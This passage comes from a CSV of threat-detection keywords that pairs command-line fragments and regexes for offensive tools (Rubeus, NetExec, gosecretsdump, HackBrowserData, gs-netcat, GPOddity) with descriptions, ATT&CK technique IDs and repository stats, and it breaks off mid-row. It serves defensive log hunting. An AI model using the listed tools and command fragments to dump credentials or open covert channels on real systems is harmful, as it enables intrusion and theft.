*",".{0,1000}\sgive\-genericall\s.{0,1000}\s\-target\-sid\s.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","0","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "* gkrellm-info.nse*",".{0,1000}\sgkrellm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gmailC2.exe*",".{0,1000}\sgmailC2\.exe.{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "* --gmsa-decrypt-lsa *",".{0,1000}\s\-\-gmsa\-decrypt\-lsa\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "* go build -o padre .*",".{0,1000}\sgo\sbuild\s\-o\spadre\s\..{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "* golden * /badpwdcount*",".{0,1000}\sgolden\s.{0,1000}\s\/badpwdcount.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* golden * /ldap *",".{0,1000}\sgolden\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* golden * /user:*",".{0,1000}\sgolden\s.{0,1000}\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* goldenPac.py *",".{0,1000}\sgoldenPac\.py\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* goldenPac.py -c *.exe*",".{0,1000}\sgoldenPac\.py\s\-c\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* goldenPac.py*",".{0,1000}\sgoldenPac\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* gopher-ls.nse*",".{0,1000}\sgopher\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* gophish-*.zip*",".{0,1000}\sgophish\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","290","54","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "* gosecretsdump_linux*",".{0,1000}\sgosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* gosecretsdump_mac*",".{0,1000}\sgosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* gosecretsdump_win*",".{0,1000}\sgosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "* goWMIExec_linux_*",".{0,1000}\sgoWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "* goWMIExec_mac_*",".{0,1000}\sgoWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "* goWMIExec_win_*",".{0,1000}\sgoWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","10","3","212","43","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z" "* 'GPODDITY$' *",".{0,1000}\s\'GPODDITY\$\'\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --gpo-id * --domain * --command *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-domain\s.{0,1000}\s\-\-command\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --gpo-id * --gpo-type * --no-smb-server *",".{0,1000}\s\-\-gpo\-id\s.{0,1000}\s\-\-gpo\-type\s.{0,1000}\s\-\-no\-smb\-server\s.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "* --GPOName * --FilterEnabled --TargetDnsName *",".{0,1000}\s\-\-GPOName\s.{0,1000}\s\-\-FilterEnabled\s\-\-TargetDnsName\s.{0,1000}","offensive_tool_keyword","SharpGPOAbuse","SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.","T1546.008 - T1204 - T1134 ","TA0007 - TA0008 - TA0003 - TA0004 ","N/A","N/A","Defense Evasion","https://github.com/FSecureLABS/SharpGPOAbuse","1","0","N/A","N/A","10","951","133","2020-12-15T14:48:31Z","2019-04-01T12:10:25Z" "* gpp_autologin*",".{0,1000}\sgpp_autologin.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* gpp_password*",".{0,1000}\sgpp_password.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* gpsd-info.nse*",".{0,1000}\sgpsd\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*--------------------- GraphRunner Module ----------------------*",".{0,1000}\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\sGraphRunner\sModule\s\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* GraphRunner.ps1*",".{0,1000}\sGraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","1","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* GraphSpy.py*",".{0,1000}\sGraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "* GraphStrike.py*",".{0,1000}\sGraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "* GreatSCT/*",".{0,1000}\sGreatSCT\/.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* --greeting * --personalize *--securelink*",".{0,1000}\s\-\-greeting\s.{0,1000}\s\-\-personalize\s.{0,1000}\-\-securelink.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","0","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "* -grouper2 -Command *",".{0,1000}\s\-grouper2\s\-Command\s.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "* gs-netcat *",".{0,1000}\sgs\-netcat\s.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* gsocket.io/x*",".{0,1000}\sgsocket\.io\/x.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* GSOCKET_SOCKS_IP*",".{0,1000}\sGSOCKET_SOCKS_IP.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "* gtfobin_update.py*",".{0,1000}\sgtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* gtfonow.py*",".{0,1000}\sgtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "* -H * -u * -p * -r *C$/Users*",".{0,1000}\s\-H\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-r\s.{0,1000}C\$\/Users.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "* -h *-p * -c cypher.bin -k key.bin*",".{0,1000}\s\-h\s.{0,1000}\-p\s.{0,1000}\s\-c\scypher\.bin\s\-k\skey\.bin.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "* hack.py*",".{0,1000}\shack\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* HackBrowserData",".{0,1000}\sHackBrowserData","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tools","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","10","10012","1478","2024-05-01T17:51:49Z","2020-06-18T03:24:31Z" "* HackBrowserData*",".{0,1000}\sHackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","10","10","161","24","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z" "* hacked_getdents*",".{0,1000}\shacked_getdents.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "* hackergu *",".{0,1000}\shackergu\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-datanode-info.nse*",".{0,1000}\shadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-jobtracker-info.nse*",".{0,1000}\shadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-namenode-info.nse*",".{0,1000}\shadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-secondary-namenode-info.nse*",".{0,1000}\shadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hadoop-tasktracker-info.nse*",".{0,1000}\shadoop\-tasktracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* Hak5.sh*",".{0,1000}\sHak5\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* harvest * /monitorinterval:*",".{0,1000}\sharvest\s.{0,1000}\s\/monitorinterval\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* -hasbootstraphint *",".{0,1000}\s\-hasbootstraphint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* -hashes * -spn * -impersonate *",".{0,1000}\s\-hashes\s.{0,1000}\s\-spn\s.{0,1000}\s\-impersonate\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* -hashes lm:nt -gpo-id * -powershell *",".{0,1000}\s\-hashes\slm\:nt\s\-gpo\-id\s.{0,1000}\s\-powershell\s.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","0","N/A","8","4","305","37","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z" "* --hash-type * --attack-mode 